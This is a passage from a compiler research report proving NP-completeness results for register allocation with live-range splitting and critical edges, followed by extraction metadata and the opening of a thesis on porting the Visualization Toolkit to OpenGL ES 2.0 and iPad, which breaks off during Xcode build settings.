with only 3 registers (see Figure 2 for a possible allocation of the program of Figure 1). Indeed, as there are no critical edges anymore, --- \(^1\)Actually, Chaitin’s definition of interference is slightly different: Two variables interfere only if one is live at the definition of the other one. However, the two definitions coincide for programs where any control-fbw path from the beginning of the program to a given use of a variable goes through a definition of this variable. Such programs are called strict. This is the case for the programs we manipulate in our NP-completeness proofs. we can color the two variables of each basic block of type $B_{u,v}$ independently and ‘repair’, when needed, the coloring to match the colors at each join, i.e., each basic block of type $B_{u}$. This is done by introducing an adequate re-mapping of registers (here a single move) in the new block along the edge from $B_{u,v}$ to $B_{u}$. When there are no critical edges, one can indeed go through SSA (or any representation of live ranges as subtrees of a tree), i.e., consider that all definitions of a given variable belong to different live ranges, and to color them with $k$ colors, if possible, in linear time (because the corresponding interference graph is chordal) in a greedy fashion. At this stage, it is of course easy to decide if $k$ registers are enough. This is possible if and only if Maxlive, the maximal number of values live at any program point, is less than $k$. Indeed, Maxlive is obviously a lower bound for the minimal number of registers needed, as all variables live at a given point interfere (at least for strict programs). Furthermore, this lower bound can be achieved by coloring because of a double property of such live ranges: a) Maxlive is equal to the size of a maximal clique in the interference graph (in general, it is only a lower bound); b) the size of a maximal clique and the chromatic number of the graph are equal (as the graph is chordal). Furthermore, if $k$ registers are not enough, additional splitting will not help as splitting does not change Maxlive. If $k$ colors are enough, it is still possible that colors do not match at join points where live ranges were split. Some ‘shuffle’ of registers is needed in the block along the edge where colors do not match. The fact that the edge is not critical guarantees that the shuffle will not propagate along other control flow paths. A shuffle is a permutation of the registers. If some register is available at this program point, i.e., if Maxlive < k, then any remapping can be performed as a sequence of register-to-register moves, possibly using the free register as temporary storage. Otherwise, one additional register is needed unless one can perform register swap (arithmetic operations are also possible but maybe only for integer registers). This view of coloring through the insertion of permutations is the base of any approach that optimizes spilling first. Some spilling is done (optimally or not) so as to reduce the register pressure (Maxlive) to at most k. In [1], this approach is even used in the most extreme form: live ranges are split at each program point in order to address the problem of optimal spilling. After the first spilling phase, there is a potential permutation between any two program points. Then, live ranges are merged back, as most as possible, thanks to coalescing. In other words, it seems that going through SSA (for example) makes easy the problem of deciding if k registers are enough. The only possible remaining case is if we do not allow any register swap. If colors do not match at a joint point where Maxlive = k, then the permutation cannot be performed. This is the question addressed by Ferreira and Palsberg in [19]: Can we easily choose an adequate coloring of the SSA representation so that no permutation (different than identity) is needed? The answer is no, the problem is NP-complete. To show this result, Ferreira and Palsberg use a reduction from the problem of coloring circular-arc graphs [10]. Basically, the idea is to start from a circular-arc graph, to choose a particular split point of the arcs to get an interval graph, to represent this interval graph as the interference graph of some basic block, to add a back edge to form a loop, and to make sure that Maxlive = k on the back edge. In this case, coloring the basic block so that no permutation is needed on the back edge is equivalent to coloring the original circular-arc graph. Actually, this is the same proof technique used in [10] to reduce the coloring of circular-arc graphs from a permutation problem. This proof shows that if the split points are chosen a priori, then it is difficult to choose the right coloring of the SSA representation (and thus decide if k registers are enough) even for a simple loop and a single split point. However, for a fixed k, this specific problem is polynomial as it is the case for the k-coloring problem of circular-arc graphs. We now show that, with a simple variation of Chaitin’s proof, a similar result can be proved even for a fixed k, but for an arbitrary program. Consider the same program structure as Chaitin does, but after critical edges have been removed, thus a program structure such as in Figure 2. Given an arbitrary graph G = (V, E), the program has three variables u, x_u, y_u for each vertex u ∈ V and a variable x_{u,v} for each edge (u, v) ∈ E. It has the following structure: - For each (u, v) ∈ E, there is a block B_{u,v} that defines u, v, and x_{u,v}. - For each u ∈ V, there is a block B_u that reads u, y_u, and x_u, and returns a new value. - For each block B_{u,v}, there is a path to the blocks B_u and B_v. Along the path from B_{u,v} to B_u, there is a block that reads v and x_{u,v} to define y_u, and then defines x_u. - An entry block switches to all blocks B_{u,v}. The interference graph restricted to variables u (those that correspond to vertices of G) is still exactly G. Figure 3 shows the program associated to a cycle of length 4, with edges (a, b), (a, c), (b, d), and (c, d). It has no critical edge. Assume that permutations can be placed only along the edges, or equivalently on entry or exit of the intermediate blocks that are between blocks of type $B_{uv}$ and type $B_{u}$. We claim that the program can be assigned to 3 registers if and only if $G$ is 3-colorable. Indeed, it is easy to see that on each control-flow edge, exactly 3 variables are live, therefore if only 3 registers are used, no permutation different than identity can be performed. As a consequence, the live range of any variable $u \in V$ cannot be split, each variable is therefore assigned to a unique color. Using the same color for the corresponding vertex in $G$ gives a 3-coloring of the $G$. Conversely, if $G$ is 3-colorable, assign to each variable $u$ the same color as the vertex $u$. It remains to color the variables $x_{uv}$, $x_{u}$, and $y_{u}$. This is easy: in block $B_{uv}$, only two colors are used so far, the color for $u$ and the color for $v$, so $x_{uv}$ can be assigned the remaining color. Finally assigned $x_u$ to a color different than $u$, and $y_u$ to the remaining color. This gives a valid register assignment of the program. ![Figure 3](image-url) Figure 3: The program associated to a cycle of length 4. To get a similar proof for any fixed $k > 3$, just add $k - 3$ variables in the switch block and make their live ranges traverse all other blocks. What we just proved, with this slight variation of Chaitin’s proof, is that if split points are fixed (as this is traditionally the case when going out of SSA), then it is NP-complete to decide if $k$ registers are sufficient, even for a fixed $k \geq 3$ and even if the program has no critical edge. 4 When split points can be anywhere Does the study of Section 3 completely answer the question? Not quite. Indeed, who said that split points are fixed? Why can’t we shuffle registers at any program point? Consider Figure 3 again. The register pressure is 3 on any control-flow edge, but it is not 3 everywhere. In particular, between the definitions of each $y_u$ and each $x_u$, the register pressure drops to 2. At this point, some register-to-register moves could be inserted to permute two colors. Actually, if we allow to split wherever we want then, for such a program, 3 registers are always enough. Indeed, for each block $B_{u,v}$, color $u$, $v$, and $x_{u,v}$ with 3 different colors, arbitrarily. For each block $B_u$, do the same for $u$, $x_u$, and $y_u$. In the block between $B_{u,v}$ and $B_u$, give to $x_u$ the same color it has in $B_u$ and give to $y_u$ a color different than the color given to $u$ in $B_{u,v}$. Now, between the definitions of $y_u$ and $x_u$, only two registers contain a live value: the register that contains $u$ defined in $B_{u,v}$ and the register that contains $y_u$. These two values can be moved to the registers where there are supposed to be in $B_u$, with one move, two moves, or three moves in case of a swap, using the available register in which $x_u$ is going to be defined just after this shuffle. So, is it really NP-complete to decide if $k$ registers are enough when splitting can be done anywhere? The problem with the previous construction is that there is no way to not leave a program point with a low register pressure with simple statements while keeping NP-completeness. But, if we are considering the register allocation problem for an architecture with instructions that can define more than one value, it is easy to modify the proof. In a block where $y_u$ and $x_u$ are defined, use a parallel statement that uses $v$ and $x_{u,v}$ and defines $y_u$ and $x_u$ simultaneously, for example something like $(x_u, y_u) = (b + x_{u,v}, b - x_{u,v})$. Now, Maxlive = 3 everywhere in the program and, even if splitting is allowed anywhere, the program can be mapped to 3 registers if and only if $G$ is 3-colorable. Therefore, it is NP-complete to decide if $k$ registers are enough if two variables can be created simultaneously by a machine instruction, even if there is no critical edge and if we can split wherever we want. Notice the similarity with circular-arc graphs: as noticed in [10], the problem of coloring circular-arc graphs remains NP-complete even if at most 2 circular arcs can start at any point (but not if at most 1 can start, as we show below). However, if such instructions exist, it is more likely that a register swap is also provided in the architecture, in which case we are back to the easy case where any permutation can be done and $k$ registers are enough if and only if Maxlive = $k$. It remains to consider one case: what if only one variable can be created at a given time as it is in traditional sequential assembly code representation? We claim this is polynomial to decide if $k$ registers are enough, in the case of a strict program and if we are allowed to introduce blocks to remove critical edges. This can be done as follows. Consider the program after edge splitting and compute Maxlive, the maximal number of values live at any program point. If Maxlive < $k$, it is always possible to assign variables to $k$ registers by splitting live ranges as we already discussed because adequate permutations can always be performed. If Maxlive > $k$, this is not possible, more spilling has to be done. The remaining case is thus when Maxlive = $k$. If Maxlive = $k$, restrict to the control-flbw graph defined by program points where exactly $k$ variables are live. We claim that, in each connected component of this graph, if $k$ registers are enough, there is a unique solution, up to a permutation of colors. Indeed, for each connected --- 2This is true for a strict program. For a non-strict program, one needs to consider another definition of Maxlive. We do not address non-strict programs in this report. component, start from a particular program point and a particular coloring of the $k$ variables live at this point. Propagate this coloring in a greedy fashion, backwards or forwards along the control flow. In this process, there is no ambiguity because the number of live variables remains equal to $k$: At any program point, since one variable (and only one) is created, exactly one must become dead, and the new variable must be assigned the same color as the dead one. Therefore, going backwards or forwards defines a unique solution (up to the initial permutation of colors). In other words, if there is a solution, we can define it, in each connected component, by propagation. If, during this traversal, we reach a program point already assigned and if the colors do not match, this proves that $k$ registers are not enough. Finally, if the propagation of colors on each connected component is possible, then $k$ registers are enough for the whole program. Indeed, we can color the rest in a greedy (but not unique) fashion and, when we reach a point already assigned, we can resolve a possible register mismatch because at most $k - 1$ variables are live at this point. To conclude, to decide if $k$ registers are enough, one just need to propagate colors along the control flow. We first propagate along program points where Maxlive = $k$. If we reach a program point already colored and the colors do not match, more spilling needs to be done. Otherwise, we start a second phase of propagation, along all remaining program points. If we reach a program point already colored and the colors do not match, we resolve the problem with a permutation of at most $k - 1$ registers. 5 Conclusion In this report, we tried to make clearer where the complexity of register allocation comes from. Our goal was to recall what exactly Chaitin’s original proof proves and to extend this result. The main question addressed by Chaitin is of the following type: Can we decide if $k$ registers are enough for a given program or if some spilling is necessary? The original proof of Chaitin [6] proves that this problem is NP-complete if each variable can be assigned to only one register (i.e., no live range splitting). We showed that Chaitin’s construction also proves the NP-completeness of the problem if live range splitting is allowed but if we are not allowed to remove critical edges (i.e., no edge splitting). Recently, Ferreira and Palsberg [19] proves that, if $k$ is arbitrary and the program is a loop, then the problem remains NP-complete if live range splitting is allowed but only on a block on the back edge and if register swaps are not available. This is a particular form of register allocation through SSA. We showed that Chaitin’s proof can be extended to show a bit more. The problem remains NP-complete for a fixed $k \geq 3$, even if the program has no critical edge and if we can split live ranges along any control-fbw edge (but not inside basic blocks). This again is if register swaps are not available. These results do not address the general case where we are allowed to split wherever we want, including inside basic blocks. We show that the problem remains NP-complete but only if some instructions can define two variables simultaneously. For a strict program and/or if we consider that two variables interfere if and only if they are both live at some program point, we can answer the remaining cases. First $k$ must be at least Maxlive, the maximal number of variables live at any program point. If Maxlive < $k$ or if register swaps are available (which is likely to be the case if some instructions can define two variables simultaneously) then $k$ registers are enough. If register swaps are not available and if only one variable can be defined at a given program point, then a simple polynomial-time greedy approach can be used to decide if $k$ registers are enough. This study shows that the NP-completeness of register allocation is not due to the coloring phase (as a misinterpretation of Chaitin’s proof may suggest); deciding if $k$ registers are enough or if spilling is necessary is not as hard as one might think. The NP-completeness of register allocation is due to the presence of critical edges or not, and to the optimization of spilling costs (which variables should be spilled and where so as to reduce Maxlive with a minimal cost?) and coalescing costs (which live ranges should be fused so as to minimize register-to-register moves while keeping the graph $k$-colorable?). References
{"Source-Url": "https://hal-lara.archives-ouvertes.fr/hal-02102286/file/RR2006-13.pdf", "len_cl100k_base": 8398, "olmocr-version": "0.1.53", "pdf-total-pages": 15, "total-fallback-pages": 0, "total-input-tokens": 43981, "total-output-tokens": 10585, "length": "2e13", "weborganizer": {"__label__adult": 0.0004055500030517578, "__label__art_design": 0.0003495216369628906, "__label__crime_law": 0.0004737377166748047, "__label__education_jobs": 0.0006203651428222656, "__label__entertainment": 6.645917892456055e-05, "__label__fashion_beauty": 0.000202178955078125, "__label__finance_business": 0.0002467632293701172, "__label__food_dining": 0.0004553794860839844, "__label__games": 0.0007829666137695312, "__label__hardware": 0.0020294189453125, "__label__health": 0.0007734298706054688, "__label__history": 0.0003266334533691406, "__label__home_hobbies": 0.00011730194091796876, "__label__industrial": 0.0005793571472167969, "__label__literature": 0.00029921531677246094, "__label__politics": 0.0003979206085205078, "__label__religion": 0.0006184577941894531, "__label__science_tech": 0.0545654296875, "__label__social_life": 7.617473602294922e-05, "__label__software": 0.00516510009765625, "__label__software_dev": 0.93017578125, "__label__sports_fitness": 0.0003666877746582031, "__label__transportation": 0.0007739067077636719, "__label__travel": 0.00022101402282714844}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 41372, 0.03405]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 41372, 0.36762]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 41372, 0.87402]], "google_gemma-3-12b-it_contains_pii": [[0, 1022, false], [1022, 1185, null], [1185, 4208, null], [4208, 6961, null], [6961, 10928, null], [10928, 15057, null], [15057, 17040, null], [17040, 21021, null], [21021, 22925, null], [22925, 26549, null], [26549, 28219, null], [28219, 32340, null], [32340, 36125, null], [36125, 38722, null], [38722, 41372, null]], "google_gemma-3-12b-it_is_public_document": [[0, 1022, true], [1022, 1185, null], [1185, 4208, null], [4208, 6961, null], [6961, 10928, null], [10928, 15057, null], [15057, 17040, null], [17040, 21021, null], [21021, 22925, null], [22925, 26549, null], [26549, 28219, null], [28219, 32340, null], [32340, 36125, null], [36125, 38722, null], [38722, 41372, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 41372, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 41372, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 41372, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 41372, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 41372, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 41372, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 41372, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 41372, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 41372, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 41372, null]], "pdf_page_numbers": [[0, 1022, 1], [1022, 1185, 2], [1185, 4208, 3], [4208, 6961, 4], [6961, 10928, 5], [10928, 15057, 6], [15057, 17040, 7], [17040, 21021, 8], [21021, 22925, 9], [22925, 26549, 10], [26549, 28219, 11], [28219, 32340, 12], [32340, 36125, 13], [36125, 38722, 14], [38722, 41372, 15]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 41372, 0.0]]}
olmocr_science_pdfs
2024-12-07
2024-12-07
dfc5f107145df8c0c52a6e48e37d602c4165e5f4
Porting Visualization Toolkit to OpenGL ES 2.0 and iPad SASON OHANIAN SAKI KTH Computer Science and Communication Master of Science Thesis Stockholm, Sweden 2012 Porting Visualization Toolkit to OpenGL ES 2.0 and iPad SASON OHANIAN SAKI DD221X, Master’s Thesis in Computer Science (30 ECTS credits) Degree Progr. in Computer Science and Engineering 270 credits Royal Institute of Technology year 2012 Supervisor at CSC was Lars Kjelldahl Examiner was Olle Bälter TRITA-CSC-E 2012:034 ISRN-KTH/CSC/E--12/034--SE ISSN-1653-5715 Abstract Visualization Toolkit (VTK) is an open source, cross-platform library for visualization, 3D graphics and image processing, written in C++ and OpenGL. In this report we investigate how VTK can be extended and modified to add support for the iPad. In particular the rendering library of VTK was investigated and its library dependencies. We found that the rendering implementation of VTK makes wide use of the fixed function pipeline of OpenGL, which is unsupported in OpenGL ES 2.0 (GLES) used on iPad. Consideration was taken into the platform specific assumptions made by VTK and the use of unsupported code and external libraries. The conclusion is that the build system of VTK (CMake) needs revision and extension to allow the generation of a compiling XCode iOS project. Furthermore we investigate the window handling and interaction frameworks of VTK to plugin and use iPad specific windowing, views and multitouch events. Portning av Visualization Toolkit till OpenGL ES 2.0 och iPad Sammanfattning # Table of Contents 1 Introduction ................................................................................. 1 2 Problem Statement ................................................................... 1 3 Delimitations ............................................................................ 1 4 Background ............................................................................. 2 4.1 VTK .................................................................................. 2 4.2 VTK Graphics Model .......................................................... 2 vtkProp/vtkProp3D (super-class of vtkActor, vtkActor2D, vtkVolume) .... 2 vtkLight ............................................................................. 2 vtkCamera ........................................................................... 3 vtkProperty, vtkProperty2D, vtkVolumeProperty ...................... 3 vtkMapper, vtkMapper2D, vtkVolumeMapper .. ...................... 3 vtkRenderer, vtkRenderWindow ....................................... 3 4.3 OpenGL ............................................................................. 4 4.4 OpenGL ES ....................................................................... 5 4.5 CMake ............................................................................. 6 Conditional statements ......................................................... 7 Looping constructs ............................................................. 7 Procedure definitions ........................................................ 7 Hello World Example ......................................................... 8 5 Building VTK ........................................................................... 9 5.1 CMake ............................................................................. 9 5.2 XCode ............................................................................ 12 5.3 iOS - Simulator and Hardware ........................................ 13 6 Compiling and Running VTK on iOS ...................................... 15 6.1 System overview ................................................................. 15 6.2 vtkRendering Target Dependency Hierarchy ..................... 16 6.3 Modifying Targets ............................................................... 17 Vtkftgl and vtkFreetype ...................................................... 17 VtkGraphics, vtkCommon, vtkFiltering and vtkVerdict ............. 17 VtkImaging ........................................................................ 17 VtkIO .............................................................................. 17 VtkParseOGLExt .................................................................. 18 VtkEncodeString ............................................................... 18 VtkRendering .................................................................... 18 7 VTK Frameworks .................................................................... 19 7.1 Rendering .......................................................................... 19 VtkRenderWindow ................................................................ 20 vtkRenderer ..................................................................... 21 Extending VTK factories ..................................................... 22 7.2 Window and View handling ............................................... 23 UIWindow .......................................................................... 23 UIView ............................................................................ 24 7.3 Porting OpenGL to OpenGL ES 2.0 .................................. 24 Shaders ............................................................................ 24 7.4 Interaction .......................................................................... 26 VTK interaction framework ................................................ 26 8 Conclusions........................................................................................................... 28 8.1 Why not OpenGL ES 1.1?.................................................................................. 29 8.2 Future work........................................................................................................ 29 References ................................................................................................................. 30 1 Introduction VTK (Visualization Toolkit) is an open source, cross platform library for visualization, 3D graphics and image processing. VTK is supported by a very large community and is used in many fields, including, medical applications and physics simulation. Given the wealth of tablet computers emerging on the market, there has recently been a large interest in the community for iOS support in VTK, or more generally, embedded systems support. For the moment VTK cannot be run on an iPad, because of a number of concerns, one of which is the lack of OpenGL support. It is far from trivial to make VTK compatible with the iPad/iOS. There are many more obstacles beyond graphics rendering that have to be taken into consideration in order to port VTK. In this report we investigate how VTK works at a technical level in order to get an understating of how VTK can be modified to support OpenGL ES rendering and iOS. 2 Problem Statement The work described in this report aims primarily at answering the following question: *How may the Visualization Toolkit, which currently supports the operating systems Windows, Macintosh and Linux, and renders its graphics in OpenGL, be adapted to run on iPad/iOS?* This general problem statement can be broken down into sub-problems. 1. What platform specific assumptions does VTK make? What has to be modified, added or removed in order for VTK to compile and run on iOS? 2. How can VTKs graphics rendering be ported or re-implemented to support OpenGL ES 2 and iOS. 3. How is user interaction handled in VTK (e.g. mouse and keyboard input), and what needs to be modified in VTK to support multi touch interaction in iOS? 3 Delimitations The scope of the question asked is potentially very large. In order to narrow down the area of investigation the work will primarily concentrate on answering the question at a general level, which means that the aim is not to make a runnable prototype of VTK on iOS, neither to give a detailed implementation proposal on how to make all parts of VTK iOS compatible. The main aim is to answer sub-question one and two, which are assumed to be essential for making a proof of concept possible. The work will only concentrate on investigating the rendering capabilities of VTK, and its dependencies. Higher-level VTK libraries will be left out. 4 Background 4.1 VTK VTK (Visualization Toolkit) is an open-source software system for 3D graphics, image processing, and visualization [1]. VTK consists of a C++ class library with several interpreted interface layers including Tcl/Tk, Java and Python. VTK is cross-platform and runs currently on Linux, Windows, Macintosh and Unix. VTK had a number of design goals in its early stages [2]. One is the toolkit philosophy that focuses on having well defined pieces of software with simple interfaces, which could be assembled into larger systems. The system should have an interpreted layer with a crisp boundary from the compiled core. The system needed to be portable. This suggests a high-level abstraction of 3D graphics that would be independent of graphics libraries such as OpenGL. There are also issues with different windowing systems on different platforms. The core system needed to be independent of windowing systems. Other important design goals were, to use standard components and languages, make the software freely available as open-source and to make the system as simple as possible for the end user who might not have any knowledge of computer graphics and visualization. 4.2 VTK Graphics Model The graphics model of VTK is defined to be easy to understand and use. It consists of a couple of basic core objects [3] that combined together creates a scene. \textbf{vtkProp/vtkProp3D (super-class of vtkActor, vtkActor2D, vtkVolume)} Props represent the things that we “see” in a scene. Props can be positioned and manipulated. Props do not directly represent their geometry; instead they refer to mapper objects, which are responsible for representing data. A prop also refers to a property object, which controls the appearance of the prop such as color, lighting effects, etc. \textbf{vtkLight} Lights are used to represent and manipulate lighting in a scene. Lights are only used in 3D. **vtkCamera** The camera object controls how 3D geometry is projected onto the 2D image plane during the rendering process. It defines amongst other characteristics, the view, position and focal point. **vtkProperty, vtkProperty2D, vtkVolumeProperty** These objects represent the property objects that instances of vtkProp refer to. **vtkMapper, vtkMapper2D, vtkVolumeMapper** Mappers are used to transform and render geometry. **vtkRenderer, vtkRenderWindow** These objects are used to manage the interfaces between the graphics engine and the computers’ windowing system. Figure 1 shows an example of the inheritance of rendering classes in VTK in order the meet the above-mentioned requirements. ![Figure 1: Inheritance diagram for vtkRenderWindow and subclasses](image) **VtkObject** is the base class for most objects in VTK, it provides methods for tracking modification time, debugging, printing, and event callbacks. **VtkWindow** is an abstract object for specifying the behavior of a rendering window. **VtkRenderWindow** is an abstract object for specifying the behavior of a rendering window. It adds methods for synchronizing the rendering process, setting windows size, control double buffering, support for stereo rendering and more. VtkOpenGLRenderWindow and vtkMesaRenderWindow are concrete implementations of vtkRenderWindow. VtkOpenGLRenderWindow interfaces with the OpenGL graphics library. Application programmers use vtkRenderWindow instead of the OpenGL specific version. A factory class determines which renderer is used. vtkCocaRenderWindow and the other objects that inherit from vtkOpenGLRenderWindow are platform specific implementations of vtkOpenGLRenderWindow that handles OS specific windowing. 4.3 OpenGL OpenGL is a standard specification defining a cross-language and cross-platform API for 2D and 3D graphics. OpenGL was developed by Silicone Graphics Inc. in 1992 and is used in many applications, amongst others, CAD, visualization and video games. Khronos Group [4] now manages OpenGL. The purpose of OpenGL is to hide the complexities of interfacing with different graphics hardware by presenting a single, uniform software interface. OpenGL accept geometric primitives as input and converts them into pixels. This is done in the graphics pipeline known as the OpenGL state machine [5]. The OpenGL commands issues primitives and configuration to be processed by the pipeline. Prior to OpenGL 2.0, each stage of the pipeline performed a fixed function and the user could make configurations to a small extent. In version 2.0 and later the user is able to fully program parts of the pipeline using vertex- and fragment (also know as pixel) shaders as seen in Figure 2 and Figure 3. Figure 2: Simplified OpenGL fixed function pipeline prior to OpenGL 2.0 Figure 3: Simplified OpenGL programmable pipeline, OpenGL 2.0 and later 4.4 OpenGL ES The “ES” in OpenGL ES stands for Embedded System. There are three versions of OpenGL ES released so far: OpenGL ES 1.0, OpenGL ES 1.1 and OpenGL ES 2.0. This work will concentrate on OpenGL ES 2.0, which is defined relative to the OpenGL 2.0 specification. This section briefly outlines the OpenGL ES 2.0 specification relative to the OpenGL 2.0 specification. Henceforth OpenGL ES will be referred to as GLES. The most significant changes in GLES 2.0 relative to GLES 1.1 are that the fixed function transformation and the fragment pipeline are not supported. Commands in GLES 2.0 cannot be placed in a display list for later processing, there is no polynomial function evaluation stage and blocks of fragments cannot be sent directly to individual fragment operations. GLES 2.0 is designed for a shader based pipeline and has no support for the fixed function pipeline. This means that a developer is forced to use and need to have knowledge of shaders. GLES 2.0 does away with the glBegin/glEnd paradigm that was used for specifying geometry. GLES 2.0 draws geometric objects exclusively using vertex arrays. Support for vertex position, normal, colors and texture coordinates are removed since they can be represented using vertex arrays. The fixed function transformation pipeline can be omitted by calculating the necessary matrices in the application and load them as uniform variables in the vertex shader. The code that transforms vertices will now be executed in the vertex shader. Clipping against the view frustum is supported, while user-specified clip planes are not. User-specified clip planes can be emulated in the vertex shader. The fixed function lighting model is no longer supported. Lighting can be implemented by writing appropriate vertex and/or pixel shaders. The texture environments present in OpenGL 2.0 are no longer supported. Fragment shaders can replace the fixed functions texture functionality. Stencil tests and blending are supported with minor changes while alpha test is removed since this can be done inside a fragment shader. 4.5 CMake CMake is used by VTK to manage the build process. It is a cross-platform, open-source build system designed to build, test and package software. CMake is compiler independent and is designed to support directory hierarchies and applications that depend on multiple libraries. CMake generates native makefiles and workspaces that can be used in the compiler environment of your own choice. The only requirement CMake has is a C++ compiler. VTK uses CMake to support a platform independent build process. CMake uses CMakeList.txt files, which contain project parameters and describe the flow control of the build process [7]. These files are placed in every directory that wishes to control the build process. The CMakeList.txt file include one or more commands using the syntax "COMMAND(args...)", where "COMMAND" represent the name of the command and "args" a list of arguments. The basic data type in CMake is a string, but it also supports lists of strings. The following statement groups together multiple arguments into a list using the SET command. \[ \text{set} (\text{Foo} \ a \ b \ c) \] This results in setting the variable Foo to a b c, and Foo can be passed into another command using \[ \text{command} (\${\text{Foo}}) \] Which is equivalent to \[ \text{command} (a \ b \ c) \] Furthermore CMake provides flow control structures much like a regular programming language. Conditional statements \[ \text{if}(\text{var}) \] \[ \quad \text{some\_command}(\ldots) \] \[ \text{endif}(\text{var}) \] Looping constructs \[ \text{set}(\text{Foo a b c}) \] \[ \text{foreach}(f \ {\$}\{\text{Foo}\}) \] \[ \quad \text{some\_command}(f) \] \[ \text{endforeach}(f) \] Procedure definitions Functions create a local scope for a variable, and macros use a global scope. The following is an example of a macro and its corresponding function: \[ \text{macro}(\text{loop\_foo Foo}) \] \[ \quad \text{foreach}(f \ {\$}\{\text{Foo}\}) \] \[ \quad \quad \text{some\_command}(f) \] \[ \quad \text{endforeach}(f) \] \[ \text{endmacro}(\text{loop\_foo}) \] \[ \text{function}(\text{loop\_foo Foo}) \] \[ \quad \text{foreach}(f \ {\$}\{\text{Foo}\}) \] \[ \quad \quad \text{some\_command}(f) \] \[ \quad \text{endforeach}(f) \] \[ \text{endfunction}(\text{loop\_foo}) \] The macro or function can then be called by writing: \[ \text{set}(\text{Foo a b c}) \] \[ \text{loop\_foo}(\{\text{Foo}\}) \] **Hello World Example** The figures below are examples of how a simple “Hello World” project [8] can be structured and configured using CMake. --- **Figure 4:** Example of CMake directory structure for "Hello World" application --- **Figure 5:** CmakeList.txt files in "Hello World" application 5 Building VTK 5.1 CMake Learning how to build VTK for iOS using CMake is not the main focus of this work, however it became impossible to ignore. Some minor changes and settings was made to the CMake configuration of the project in order to get a better starting point for the XCode project that is generated by CMake. Since VTK does not support iOS for the moment, the CMake project is not customized to support building of an iOS XCode project. To customize CMake files in VTK for complete iOS support would require a great deal of work. This is not the aim of the thesis and was therefore mostly omitted. In order to gain iOS support in the CMake build process one needs to customize CMake to cross-compile for iOS by adding iOS specific logic. This means that new files have to be included in the project and any required platform libraries such as the iOS SDK must be linked into the build. Since iPad does not support OpenGL, which VTKs rendering is implemented in, all OpenGL implementations must be switched out to OpenGL ES implementations. To do this, it is necessary to know which implementing files these changes concern. These files must be added to the CMake project hierarchy, and relevant CMake files have to be modified to add the correct files to the build depending on which platform we are building for. An example of where cross-compiling support needs to be added is in the directory rendering, which is located directly under the projects root directory. There exists a “CMakeLists.txt” in the rendering directory, which describes, amongst other things, which files that are included in a specific target, in this case the rendering target. There are also references to eventual dependencies to other targets, platform concerns and more. The figure below is an extract of the mentioned CMake file. The Kit_SRCS set contains files in the rendering target, which are classes general to the VTK rendering framework, independent of the concrete rendering implementation. The framework classes are inherited by concrete rendering implementations like the ones in KitOpenGL_SRCS. These files are concrete OpenGL implementations and need therefore to be omitted when building the project for iOS. We instead need to include new OpenGL ES specific class files. Figure 7 is a simplified example of how one could modify the CMakeLists.txt file to support building for iOS. Changes are marked with bold text. ```cpp /* vtk_root/rendering/CMakeLists.txt */ SET(KIT Rendering) SET(UKIT_RENDERING) SET(KIT_TCL_LIBS vtkGraphicsTCL vtkImagingTCL ${VTK_TK_LIBRARIES}) SET(KIT_PYTHON_LIBS vtkGraphicsPythonD vtkImagingPythonD) SET(KIT_JAVA_LIBS vtkGraphicsJava vtkImagingJava) IF (JAVA_AWT_LIBRARY) SET(KIT_JAVA_LIBS $(KIT_JAVA_LIBS) $(JAVA_AWT_LIBRARY)) ENDIF (JAVA_AWT_LIBRARY) SET(KIT_INTERFACE_LIBRARIES vtkGraphics vtkImaging) SET(KIT_LIBS vtkIO vtkftgl ${VTK_FREETYPE_LIBRARIES}) #INCLUDE(${VTK_CMAKE_DIR}/vtkTestGL.cmake) #INCLUDE(${VTK_CMAKE_DIR}/vtkTestGLX.cmake) IF(APPLE AND VTK_WRAP_JAVA) ADD_DEFINITIONS("-ObjC++") ENDIF(APPLE AND VTK_WRAP_JAVA) SET( Kit_SRCS vtkActor.cxx vtkCamera.cxx /* Additional files included in Kit_SRCS set */ ) ... SET( KitOpenGL_SRCS vtkOpenGLActor.cxx vtkOpenGLCamera.cxx /* Additional files included in Kit_OpenGL set */ ) ``` Figure 6: Extract from CMakeLists.txt under VTK rendering directory In order for the example to work, the IOS_IPAD and USE_GLES variables must be defined and set somewhere. This is done in a toolchain [9] configuration file, which in short is a file that defines the settings for the build environment and target platform. Among these are: system properties, compiler and compiler options, processor architecture, linked libraries and build properties. The toolchain file is passed as an argument to CMake when building. 5.2 XCode After configuring CMake, an XCode project can be built by using a CMake command line tool or the CMake GUI. Since the CMake files were not adapted to cross-compile and build for iOS, the delivered project will have build settings matching the environment it was built on, in this case OS X. The settings involve architecture, build location, build options, code signing, linking, packaging, search paths and more. Some of these settings have to be changed in order to compile the code for the iOS platform. ![Figure 8: Xcode build settings](image) The following changes where made to the build settings for each target in the VTK project. **Architecture:** The hardware architecture of a Mac differs from that of an iOS device. The target architecture must be changed. Changed from “32/64-bit intel” to “Optimized armv7” Base SDK: The iPad does not support the Mac OS X SDK. The Base SDK flag has to be changed to the iOS SDK that is being used. Changed from “Mac OS X 10.6 SDK” to “iOS 4.3” Supported platform: Changed from “macosx” to “iphonesimulator iphoneos” Valid architectures: Changed from “i386 X86_64” to “armv6 armv7” iOS deployment target and Targeted Device family: These flags determine which iOS SDK and device the project uses in deployment. In this case iOS 4.3 and iPad. Code signing: To be able submit an application to the AppStore the code must be signed [10]. To do this, a developer profile has to be set up in XCode. When a profile is configured correctly the code signing is set up using the code signing identity flag, where a profile is selected for signing. Code signing will not be necessary 